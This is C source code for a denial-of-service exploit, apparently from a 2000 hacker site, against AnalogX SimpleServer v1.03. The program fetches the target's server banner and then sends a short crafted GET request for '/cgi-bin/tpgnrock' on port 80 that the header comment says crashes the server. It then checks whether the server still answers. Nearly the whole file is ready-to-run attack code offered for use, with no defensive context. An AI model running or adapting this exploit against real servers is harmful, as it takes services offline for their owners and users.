/*
  This problem is similar to the one USSRback.com
  reported on in Dec.1999 in reference to version
  1.01. In that report, a 'GET' command with 1000
  char buffer would cause a buffer overflow.After
  running the code below (which  is derived  from
  some cgi scan code), version  1.03 committed to
  a crash.  This  is  one  of  those  bugs I find
  trivial. Any requested file with 'GET' involved
  over or below 17 characters  will not crash the
  server.
 
  Code ripped from a cgi scanner.  I actually
  stumbled upon the exploit through this code.
 
                                 -Presto/tPG
*/

#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

void main(int argc, char *argv[])
{
  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,foreign=0;
  char ojsimp[20];
  char *okay[2];
  char *player[2];

  okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
  player[1] = "Check if its running now.";

  if (argc<2)
    {
      printf("\n HOSTNAME PLEASE@!# ");
      exit(0);
    }
  if ((he=gethostbyname(argv[1])) == NULL)
    {
      herror("gethostbyname");
      exit(0);
    }
  printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n");
  start=inet_addr(argv[1]);
  counter=ntohl(start);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
      perror("connect");
    }
  printf("\n\n HTTPD Version. \n");
  getchar();
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  recv(sock, buffer, sizeof(buffer),0);
  printf("%s",buffer);
  close(sock);
  printf("\n\t Press something. \n");
  getchar();
  while(count++ < 2)
    {
      sock=socket(AF_INET, SOCK_STREAM, 0);
      bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
      sin.sin_family=AF_INET;
      sin.sin_port=htons(80);
      if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
        {
          perror("connect");
        }

      printf(" %s : ",player[count]);
      for(numin=0;numin < 20;numin++)
        {
          ojsimp[numin] = '\0';
        }
      send(sock, okay[count],strlen(okay[count]),0);
      recv(sock, ojsimp, sizeof(ojsimp),0);
      cgistr = strstr(ojsimp,foundmsg);

      if( cgistr != NULL)
        {
          printf("Heh.\n");
          ++foreign;
        }
      else printf(" tPG\n");

      close(sock);
    }
  if (foreign)
    {
      printf("bl3h. bl4h. h3h. w00p. 33p.\n");
    }
}
/*                    www.hack.co.za              [2000]*/